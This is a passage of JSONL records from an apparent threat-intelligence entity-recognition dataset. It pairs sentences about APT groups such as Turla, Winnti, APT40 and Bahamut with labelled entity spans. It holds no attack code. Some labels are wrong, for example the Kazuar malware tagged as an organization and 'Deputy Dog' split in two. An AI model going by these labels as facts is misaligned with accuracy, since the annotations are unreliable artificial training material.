"dnrti_train_001582", "source": "dnrti_train"}} {"text": "The attackers first infected in March 2017 .", "spans": {}, "info": {"id": "dnrti_train_001583", "source": "dnrti_train"}} {"text": "Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers .", "spans": {}, "info": {"id": "dnrti_train_001584", "source": "dnrti_train"}} {"text": "The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft.NET Framework that offers actors complete access to compromised systems targeted by its operator .", "spans": {"TOOL: Kazuar": [[46, 52]]}, "info": {"id": "dnrti_train_001585", "source": "dnrti_train"}} {"text": "We suspect the Kazuar tool may be linked to the Turla threat actor group ( also known as Uroburos and Snake ) , who have been reported to have compromised embassies , defense contractors , educational institutions , and research organizations across the globe .", "spans": {"TOOL: Kazuar tool": [[15, 26]], "THREAT_ACTOR: Uroburos": [[89, 97]], "THREAT_ACTOR: Snake": [[102, 107]], "ORGANIZATION: embassies": [[155, 164]], "ORGANIZATION: defense contractors": [[167, 186]], "ORGANIZATION: educational institutions": [[189, 213]], "ORGANIZATION: research organizations": [[220, 242]]}, "info": {"id": "dnrti_train_001586", "source": "dnrti_train"}} {"text": "This is also a full-featured backdoor controlled by email , and which can work independently of any other Turla component .", "spans": {"TOOL: full-featured backdoor": [[15, 37]]}, "info": {"id": "dnrti_train_001587", "source": "dnrti_train"}} {"text": "A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 .", "spans": {"TOOL: Kazuar": [[80, 86]]}, "info": {"id": "dnrti_train_001588", "source": "dnrti_train"}} {"text": "If the hypothesis is correct and the Turla threat group is using Kazuar , we believe they 
may be using it as a replacement for Carbon and its derivatives .", "spans": {"THREAT_ACTOR: Turla": [[37, 42]], "TOOL: Kazuar": [[65, 71]], "TOOL: Carbon": [[127, 133]]}, "info": {"id": "dnrti_train_001589", "source": "dnrti_train"}} {"text": "We used a combination of tools such as NoFuserEx , ConfuserEx Fixer , ConfuserEx Switch Killer , and de4d0t in order to deobfuscate the code for in depth analysis .", "spans": {"TOOL: NoFuserEx": [[39, 48]], "TOOL: ConfuserEx Fixer": [[51, 67]], "TOOL: ConfuserEx Switch Killer": [[70, 94]], "TOOL: de4d0t": [[101, 107]]}, "info": {"id": "dnrti_train_001590", "source": "dnrti_train"}} {"text": "Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" .", "spans": {"ORGANIZATION: Kazuar": [[0, 6]]}, "info": {"id": "dnrti_train_001591", "source": "dnrti_train"}} {"text": "The subject is a series of targeted attacks against private companies .", "spans": {"ORGANIZATION: private companies": [[52, 69]]}, "info": {"id": "dnrti_train_001592", "source": "dnrti_train"}} {"text": "e uncovered the activity of a hacking group which has Chinese origins .", "spans": {}, "info": {"id": "dnrti_train_001593", "source": "dnrti_train"}} {"text": "Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from .", "spans": {}, "info": {"id": "dnrti_train_001594", "source": "dnrti_train"}} {"text": "According to our estimations , this group has been active for several years and specializes in cyberattacks against the online video game industry .", "spans": {}, "info": {"id": "dnrti_train_001595", "source": "dnrti_train"}} {"text": "Based on our analysis , we believe that threat actors may compile Windows and Unix based payloads using the same code to deploy Kazuar against both platforms .", "spans": {"ORGANIZATION: Kazuar": [[128, 134]]}, "info": {"id": "dnrti_train_001596", "source": 
"dnrti_train"}} {"text": "The group 's main objective is to steal source codes .", "spans": {}, "info": {"id": "dnrti_train_001597", "source": "dnrti_train"}} {"text": "In 2010 HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company .", "spans": {"ORGANIZATION: HBGary": [[8, 14], [99, 105]], "ORGANIZATION: American video game company": [[124, 151]]}, "info": {"id": "dnrti_train_001598", "source": "dnrti_train"}} {"text": "In 2010 US-based HBGary investigated an information security incident related to the Winnti group at one of HBGary 's customers – an American video game company .", "spans": {"ORGANIZATION: HBGary": [[17, 23], [108, 114]], "ORGANIZATION: video game company": [[142, 160]]}, "info": {"id": "dnrti_train_001599", "source": "dnrti_train"}} {"text": "For a long time the Winnti group had been considered as a Chinese threat actor targeting gaming companies specifically .", "spans": {"THREAT_ACTOR: Winnti group": [[20, 32]], "ORGANIZATION: gaming companies": [[89, 105]]}, "info": {"id": "dnrti_train_001600", "source": "dnrti_train"}} {"text": "The Axiom group has been presented as an advanced Chinese threat actor carrying out cyber-espionage attacks against a whole range of different industries .", "spans": {"THREAT_ACTOR: Axiom": [[4, 9]]}, "info": {"id": "dnrti_train_001602", "source": "dnrti_train"}} {"text": "this library includes two drivers compiled on August 22 and September 4 , 2014 .", "spans": {}, "info": {"id": "dnrti_train_001603", "source": "dnrti_train"}} {"text": "Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies .", "spans": {"ORGANIZATION: Kaspersky Security Network": [[106, 132]], "ORGANIZATION: KSN": [[135, 138]], "ORGANIZATION: gaming companies": [[191, 207]]}, "info": {"id": 
"dnrti_train_001604", "source": "dnrti_train"}} {"text": "Conversely , LokiBot and Agent Tesla are new malware tools .", "spans": {"TOOL: LokiBot": [[13, 20]], "TOOL: Agent Tesla": [[25, 36]]}, "info": {"id": "dnrti_train_001605", "source": "dnrti_train"}} {"text": "Based on multiple active compromises by the Axiom threat group , Novetta was able to capture and analyze new Winnti malware samples .", "spans": {"ORGANIZATION: Novetta": [[65, 72]], "TOOL: Winnti malware samples": [[109, 131]]}, "info": {"id": "dnrti_train_001606", "source": "dnrti_train"}} {"text": "Initial attack targets are commonly software and gaming organizations in United States , Japan , South Korea , and China .", "spans": {"ORGANIZATION: gaming organizations": [[49, 69]]}, "info": {"id": "dnrti_train_001607", "source": "dnrti_train"}} {"text": "The samples Novetta obtained from the active Axiom infection were compiled in mid- to late 2014 and represent what Novetta is referring to as version 3.0 of the Winnti lineage .", "spans": {"ORGANIZATION: Novetta": [[12, 19], [115, 122]], "THREAT_ACTOR: Winnti": [[161, 167]]}, "info": {"id": "dnrti_train_001609", "source": "dnrti_train"}} {"text": "We assess with high confidence that the Winnti umbrella is associated with the Chinese state intelligence apparatus , with at least some elements located in the Xicheng District of Beijing .", "spans": {}, "info": {"id": "dnrti_train_001610", "source": "dnrti_train"}} {"text": "The Winnti umbrella continues to operate highly successfully in 2018 .", "spans": {}, "info": {"id": "dnrti_train_001611", "source": "dnrti_train"}} {"text": "The Winnti umbrella and closely associated entities has been active since at least 2009 .", "spans": {}, "info": {"id": "dnrti_train_001612", "source": "dnrti_train"}} {"text": "The Winnti and Axiom group names were created by Kaspersky Lab and Symantec , respectively , for their 2013/2014 reports on the original group .", "spans": {"THREAT_ACTOR: Winnti": [[4, 10]], 
"THREAT_ACTOR: group": [[21, 26]], "ORGANIZATION: Kaspersky Lab": [[49, 62]], "ORGANIZATION: Symantec": [[67, 75]]}, "info": {"id": "dnrti_train_001613", "source": "dnrti_train"}} {"text": "Their operations against gaming and technology organizations are believed to be economically motivated in nature .", "spans": {"ORGANIZATION: gaming": [[25, 31]], "ORGANIZATION: technology organizations": [[36, 60]]}, "info": {"id": "dnrti_train_001614", "source": "dnrti_train"}} {"text": "However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused .", "spans": {}, "info": {"id": "dnrti_train_001615", "source": "dnrti_train"}} {"text": "The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses .", "spans": {"ORGANIZATION: gaming studios": [[59, 73]]}, "info": {"id": "dnrti_train_001616", "source": "dnrti_train"}} {"text": "During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike .", "spans": {"TOOL: Cobalt Strike": [[147, 160]]}, "info": {"id": "dnrti_train_001617", "source": "dnrti_train"}} {"text": "In this campaign , the attackers experimented with publicly available tooling for attack operations .", "spans": {"TOOL: publicly available tooling": [[51, 77]]}, "info": {"id": "dnrti_train_001618", "source": "dnrti_train"}} {"text": "The primary goal of these attacks was likely to find code-signing certificates for signing future malware .", "spans": {}, "info": {"id": "dnrti_train_001619", "source": "dnrti_train"}} {"text": "The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , BARIUM , Wicked Panda , and GREF .", "spans": {}, "info": {"id": "dnrti_train_001620", "source": "dnrti_train"}} {"text": "The attackers behind observed activity in 2018 operate from the Xicheng 
District of Beijing via the net block 221.216.0.0/13 .", "spans": {}, "info": {"id": "dnrti_train_001621", "source": "dnrti_train"}} {"text": "ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) .", "spans": {"ORGANIZATION: Department of Homeland Security": [[72, 103]], "ORGANIZATION: DHS": [[106, 109]]}, "info": {"id": "dnrti_train_001622", "source": "dnrti_train"}} {"text": "ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security .", "spans": {"ORGANIZATION: Department of Homeland Security": [[72, 103]]}, "info": {"id": "dnrti_train_001623", "source": "dnrti_train"}} {"text": "ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems .", "spans": {"TOOL: compromised websites": [[43, 63]]}, "info": {"id": "dnrti_train_001624", "source": "dnrti_train"}} {"text": "In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) .", "spans": {"ORGANIZATION: DHS": [[20, 23]], "ORGANIZATION: Symantec": [[110, 118]], "ORGANIZATION: Dragos": [[143, 149]]}, "info": {"id": "dnrti_train_001625", "source": "dnrti_train"}} {"text": "In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group .", "spans": {"ORGANIZATION: DHS": [[20, 23]]}, "info": {"id": "dnrti_train_001626", "source": "dnrti_train"}} {"text": "We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus .", "spans": {}, "info": {"id": "dnrti_train_001627", "source": "dnrti_train"}} {"text": "ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities 
.", "spans": {}, "info": {"id": "dnrti_train_001628", "source": "dnrti_train"}} {"text": "In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly .", "spans": {"ORGANIZATION: DHS": [[20, 23]], "ORGANIZATION: Symantec": [[110, 118]]}, "info": {"id": "dnrti_train_001629", "source": "dnrti_train"}} {"text": "Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests .", "spans": {"ORGANIZATION: DHS": [[51, 54]]}, "info": {"id": "dnrti_train_001630", "source": "dnrti_train"}} {"text": "ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system .", "spans": {}, "info": {"id": "dnrti_train_001631", "source": "dnrti_train"}} {"text": "However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": {"ORGANIZATION: Dragos WorldView": [[142, 158]]}, "info": {"id": "dnrti_train_001633", "source": "dnrti_train"}} {"text": "In addition to maritime operations in this region , Anchor Panda also heavily targeted western companies in the US , Germany , Sweden , the UK , and Australia , and other countries involved in maritime satellite systems , aerospace companies , and defense contractors .", "spans": {"ORGANIZATION: aerospace companies": [[222, 241]], "ORGANIZATION: defense contractors": [[248, 267]]}, "info": {"id": "dnrti_train_001634", "source": "dnrti_train"}} {"text": "A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology .", "spans": {"ORGANIZATION: maritime sector": [[78, 93]]}, "info": {"id": "dnrti_train_001635", "source": "dnrti_train"}} {"text": "PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military 
maritime operations in the green/brown water regions primarily in the area of operations of the South Sea Fleet of the PLA Navy .", "spans": {"THREAT_ACTOR: Anchor Panda": [[9, 21]], "ORGANIZATION: CrowdStrike": [[43, 54]]}, "info": {"id": "dnrti_train_001636", "source": "dnrti_train"}} {"text": "ALLANITE operations continue and intelligence indicates activity since at least May 2017 .", "spans": {}, "info": {"id": "dnrti_train_001637", "source": "dnrti_train"}} {"text": "APT Anchor Panda is a Chinese threat actor group who target maritime operations .", "spans": {}, "info": {"id": "dnrti_train_001638", "source": "dnrti_train"}} {"text": "According to cyber security researchers , Anchor Panda , who work directly for the Chinese PLA Navy , likely remains active .", "spans": {}, "info": {"id": "dnrti_train_001639", "source": "dnrti_train"}} {"text": "In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware as their primary attack vector is sphere phishing .", "spans": {"TOOL: Adobe Gh0st": [[22, 33]], "TOOL: Poison Ivy": [[36, 46]], "TOOL: Torn RAT malware": [[51, 67]]}, "info": {"id": "dnrti_train_001641", "source": "dnrti_train"}} {"text": "Their targets are marine companies that operate in and around the South China Sea , an area of much Chinese interest .", "spans": {"ORGANIZATION: marine companies": [[18, 34]]}, "info": {"id": "dnrti_train_001642", "source": "dnrti_train"}} {"text": "As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities .", "spans": {}, "info": {"id": "dnrti_train_001643", "source": "dnrti_train"}} {"text": "The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope .", "spans": {"THREAT_ACTOR: Advanced Persistent": [[52, 71]], "THREAT_ACTOR: Threat ( APT ) 40": [[72, 89]], "THREAT_ACTOR: Periscope": [[104, 113]]}, "info": {"id": "dnrti_train_001644", "source": "dnrti_train"}} 
{"text": "The group has been active since at least January 2013 .", "spans": {}, "info": {"id": "dnrti_train_001645", "source": "dnrti_train"}} {"text": "The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states .", "spans": {}, "info": {"id": "dnrti_train_001646", "source": "dnrti_train"}} {"text": "The main targets seem to be US companies in engineering , transport and defense , although it has targeted other organizations around the world .", "spans": {}, "info": {"id": "dnrti_train_001647", "source": "dnrti_train"}} {"text": "The times of day the group is active also suggests that it is based near Beijing and the group has reportedly used malware that has been observed in other Chinese operations , indicating some level of collaboration .", "spans": {}, "info": {"id": "dnrti_train_001648", "source": "dnrti_train"}} {"text": "Periscope 's activity has previously been suspected of being linked to China , but now researchers believe their evidence links the operation to the Chinese state .", "spans": {}, "info": {"id": "dnrti_train_001649", "source": "dnrti_train"}} {"text": "APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]], "TOOL: publicly available tools": [[159, 183]]}, "info": {"id": "dnrti_train_001650", "source": "dnrti_train"}} {"text": "Anchor Panda uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": {"TOOL: CVE software vulnerabilities": [[182, 210]]}, "info": {"id": "dnrti_train_001651", "source": "dnrti_train"}} {"text": "Like many espionage campaigns , much of APT40 's activity begins by attempting to 
trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network .", "spans": {"THREAT_ACTOR: APT40": [[40, 45]], "TOOL: Gh0st RAT trojan": [[156, 172]]}, "info": {"id": "dnrti_train_001652", "source": "dnrti_train"}} {"text": "The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": {"TOOL: CVE software vulnerabilities": [[179, 207]]}, "info": {"id": "dnrti_train_001653", "source": "dnrti_train"}} {"text": "More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors .", "spans": {}, "info": {"id": "dnrti_train_001654", "source": "dnrti_train"}} {"text": "APT5 has been active since at least 2007 .", "spans": {"THREAT_ACTOR: APT5": [[0, 4]]}, "info": {"id": "dnrti_train_001655", "source": "dnrti_train"}} {"text": "APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications .", "spans": {"THREAT_ACTOR: APT5": [[0, 4]], "ORGANIZATION: technology companies": [[127, 147]]}, "info": {"id": "dnrti_train_001656", "source": "dnrti_train"}} {"text": "APT5 targeted the network of an electronics firm that sells products for both industrial and military applications .", "spans": {"THREAT_ACTOR: APT5": [[0, 4]], "ORGANIZATION: electronics firm": [[32, 48]]}, "info": {"id": "dnrti_train_001657", "source": "dnrti_train"}} {"text": "The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided .", "spans": {}, "info": {"id": "dnrti_train_001658", "source": "dnrti_train"}} {"text": "In one case in late 2014 , APT5 breached the 
network of an international telecommunications company .", "spans": {"ORGANIZATION: international telecommunications company": [[59, 99]]}, "info": {"id": "dnrti_train_001659", "source": "dnrti_train"}} {"text": "The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies .", "spans": {"ORGANIZATION: telecommunications companies": [[144, 172]]}, "info": {"id": "dnrti_train_001660", "source": "dnrti_train"}} {"text": "APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware .", "spans": {"ORGANIZATION: telecommunications providers": [[67, 95]], "TOOL: Leouncia malware": [[101, 117]]}, "info": {"id": "dnrti_train_001661", "source": "dnrti_train"}} {"text": "We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems .", "spans": {}, "info": {"id": "dnrti_train_001662", "source": "dnrti_train"}} {"text": "The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems .", "spans": {"ORGANIZATION: FBI": [[4, 7]], "THREAT_ACTOR: group of malicious cyber actors": [[19, 50]], "THREAT_ACTOR: APT6": [[64, 68]], "THREAT_ACTOR: 1.php": [[72, 77]], "TOOL: customized malicious software": [[178, 207]]}, "info": {"id": "dnrti_train_001663", "source": "dnrti_train"}} {"text": "Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": {"ORGANIZATION: Deepen": [[0, 6]], "ORGANIZATION: China and US relations experts": [[95, 125]], "ORGANIZATION: Defense Department": 
[[128, 146]], "ORGANIZATION: geospatial groups": [[162, 179]]}, "info": {"id": "dnrti_train_001664", "source": "dnrti_train"}} {"text": "Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": {"ORGANIZATION: Government officials": [[0, 20]]}, "info": {"id": "dnrti_train_001665", "source": "dnrti_train"}} {"text": "According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": {"ORGANIZATION: Deepen": [[13, 19]], "THREAT_ACTOR: APT6": [[22, 26]], "TOOL: PDF": [[82, 85]], "TOOL: ZIP": [[90, 93]], "MALWARE: SCR file": [[170, 178]]}, "info": {"id": "dnrti_train_001666", "source": "dnrti_train"}} {"text": "Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack .", "spans": {}, "info": {"id": "dnrti_train_001667", "source": "dnrti_train"}} {"text": "The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware .", "spans": {"TOOL: Poison Ivy malware": [[158, 176]]}, "info": {"id": "dnrti_train_001668", "source": "dnrti_train"}} {"text": "Over the summer they compromised several sites , including a well-known Uyghur website written in that native language .", "spans": {}, "info": {"id": "dnrti_train_001669", "source": "dnrti_train"}} {"text": "In contrast to many other APT campaigns , which tend to rely heavily on spear phishing to gain victims , \" th3bug \" is known for compromising legitimate websites their intended visitors are likely to frequent .", "spans": {}, "info": {"id": "dnrti_train_001670", "source": "dnrti_train"}} {"text": "While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first 
reported by Cisco TRAC in late July .", "spans": {"VULNERABILITY: CVE-2014-0515": [[89, 102]], "VULNERABILITY: Adobe Flash exploit": [[103, 122]], "ORGANIZATION: Cisco TRAC": [[141, 151]]}, "info": {"id": "dnrti_train_001671", "source": "dnrti_train"}} {"text": "However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised .", "spans": {"THREAT_ACTOR: APT20": [[36, 41]], "VULNERABILITY: zero-day exploits": [[50, 67]]}, "info": {"id": "dnrti_train_001672", "source": "dnrti_train"}} {"text": "Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers .", "spans": {"ORGANIZATION: platform providers": [[204, 222]]}, "info": {"id": "dnrti_train_001673", "source": "dnrti_train"}} {"text": "Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": {"ORGANIZATION: Middle Eastern human rights activist": [[45, 81]]}, "info": {"id": "dnrti_train_001674", "source": "dnrti_train"}} {"text": "Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist – an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": {"ORGANIZATION: Iranian women 's activist": [[82, 107]], "ORGANIZATION: individual": [[113, 123]]}, "info": {"id": "dnrti_train_001675", "source": "dnrti_train"}} {"text": "In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": {"THREAT_ACTOR: Bahamut": [[62, 69]]}, "info": {"id": "dnrti_train_001676", "source": "dnrti_train"}} {"text": "Once inside a network , APT40 uses credential-harvesting tools to gain usernames 
and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves to towards the ultimate goal of stealing data .", "spans": {"THREAT_ACTOR: APT40": [[24, 29]], "TOOL: credential-harvesting tools": [[35, 62]]}, "info": {"id": "dnrti_train_001677", "source": "dnrti_train"}} {"text": "Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably .", "spans": {"THREAT_ACTOR: Bahamut": [[0, 7]], "TOOL: Android malware": [[69, 84]]}, "info": {"id": "dnrti_train_001678", "source": "dnrti_train"}} {"text": "Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": {"THREAT_ACTOR: APT5": [[16, 20]], "ORGANIZATION: organizations": [[34, 47]], "ORGANIZATION: personnel": [[52, 61]]}, "info": {"id": "dnrti_train_001680", "source": "dnrti_train"}} {"text": "However , in the same week of September a series of spearphishing attempts once again targeted a set of otherwise unrelated individuals , employing the same tactics as before .", "spans": {}, "info": {"id": "dnrti_train_001681", "source": "dnrti_train"}} {"text": "Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation .", "spans": {}, "info": {"id": "dnrti_train_001682", "source": "dnrti_train"}} {"text": "As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition .", "spans": {}, "info": {"id": "dnrti_train_001683", "source": "dnrti_train"}} {"text": "In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent .", "spans": {"TOOL: domains": [[41, 48]], "TOOL: custom Android malware agent": [[97, 125]]}, "info": {"id": 
"dnrti_train_001684", "source": "dnrti_train"}} {"text": "After the publication of the original report , these sites were taken offline despite the fact that one agent was even updated a six days prior to our post ( the \" Khuai \" application ) .", "spans": {"TOOL: Khuai": [[164, 169]]}, "info": {"id": "dnrti_train_001685", "source": "dnrti_train"}} {"text": "FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region .", "spans": {}, "info": {"id": "dnrti_train_001686", "source": "dnrti_train"}} {"text": "As a result , it is already flagged as Bahamut by antivirus engines .", "spans": {}, "info": {"id": "dnrti_train_001687", "source": "dnrti_train"}} {"text": "Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers .", "spans": {"ORGANIZATION: platform providers": [[159, 177]]}, "info": {"id": "dnrti_train_001688", "source": "dnrti_train"}} {"text": "One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software .", "spans": {"TOOL: legitimate software": [[184, 203]]}, "info": {"id": "dnrti_train_001689", "source": "dnrti_train"}} {"text": "Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords .", "spans": {}, "info": {"id": "dnrti_train_001690", "source": "dnrti_train"}} {"text": "Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" flash text \" .", "spans": {"ORGANIZATION: Google": [[98, 104]]}, "info": {"id": 
"dnrti_train_001691", "source": "dnrti_train"}} {"text": "These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address .", "spans": {}, "info": {"id": "dnrti_train_001692", "source": "dnrti_train"}} {"text": "We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations .", "spans": {"THREAT_ACTOR: Bahamut": [[30, 37]]}, "info": {"id": "dnrti_train_001693", "source": "dnrti_train"}} {"text": "Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations – not destructive attacks or fraud .", "spans": {"THREAT_ACTOR: Bahamut": [[11, 18]]}, "info": {"id": "dnrti_train_001694", "source": "dnrti_train"}} {"text": "The targets and themes of Bahamut 's campaigns have consistently fallen within two regions – South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) .", "spans": {}, "info": {"id": "dnrti_train_001695", "source": "dnrti_train"}} {"text": "Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted .", "spans": {"TOOL: Android malware": [[173, 188]]}, "info": {"id": "dnrti_train_001696", "source": "dnrti_train"}} {"text": "Bahamut targeted similar Qatar-based individuals during their campaign .", "spans": {"THREAT_ACTOR: Bahamut": [[0, 7]]}, "info": {"id": "dnrti_train_001697", "source": "dnrti_train"}} {"text": "Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using hxxp://voguextra.com/decoy.doc .", "spans": {"ORGANIZATION: Bellingcat": [[0, 10]], "MALWARE: decoy documents": [[79, 94]], "MALWARE: 
hxxp://voguextra.com/decoy.doc": [[132, 162]]}, "info": {"id": "dnrti_train_001698", "source": "dnrti_train"}} {"text": "The China-backed BARIUM APT is suspected to be at the helm of the project .", "spans": {}, "info": {"id": "dnrti_train_001699", "source": "dnrti_train"}} {"text": "Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers – which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab .", "spans": {"ORGANIZATION: Kaspersky Lab": [[245, 258]]}, "info": {"id": "dnrti_train_001700", "source": "dnrti_train"}} {"text": "To compromise the utility , Kaspersky Lab determined that the cyberattackers used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": {"ORGANIZATION: Kaspersky Lab": [[28, 41]]}, "info": {"id": "dnrti_train_001701", "source": "dnrti_train"}} {"text": "To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code .", "spans": {"ORGANIZATION: Kaspersky Lab": [[28, 41]]}, "info": {"id": "dnrti_train_001702", "source": "dnrti_train"}} {"text": "BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines .", "spans": {"THREAT_ACTOR: BARIUM": [[0, 6]], "THREAT_ACTOR: APT17": [[50, 55]], "THREAT_ACTOR: Axiom": [[58, 63]], "THREAT_ACTOR: Deputy": [[68, 74]], "THREAT_ACTOR: Dog": [[75, 78]], "TOOL: ShadowPad": [[110, 119]], "TOOL: CCleaner": [[124, 132]], "TOOL: software updates": [[192, 208]]}, "info": {"id": "dnrti_train_001703", "source": 
"dnrti_train"}} {"text": "That said , the \" fingerprints \" left on the samples by the attackers – including techniques used to achieve unauthorized code execution – suggest that the BARIUM APT is behind the effort , according to the researchers .", "spans": {"THREAT_ACTOR: BARIUM APT": [[156, 166]]}, "info": {"id": "dnrti_train_001704", "source": "dnrti_train"}} {"text": "In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor .", "spans": {"ORGANIZATION: server management software provider": [[63, 98]]}, "info": {"id": "dnrti_train_001705", "source": "dnrti_train"}} {"text": "In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner were found to have been compromised by hackers to taint them with the same ShadowPad backdoor .", "spans": {"TOOL: software updates": [[38, 54]], "TOOL: ShadowPad backdoor": [[180, 198]]}, "info": {"id": "dnrti_train_001706", "source": "dnrti_train"}} {"text": "NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong .", "spans": {}, "info": {"id": "dnrti_train_001707", "source": "dnrti_train"}} {"text": "Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions of other Gulf states , Bahamut 's interests are seemingly too expansive to be limited to one sponsor or customer .", "spans": {"ORGANIZATION: labor rights advocates": [[84, 106]], "ORGANIZATION: foreign policy institutions": [[128, 155]]}, "info": {"id": "dnrti_train_001708", "source": "dnrti_train"}} {"text": "Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using 
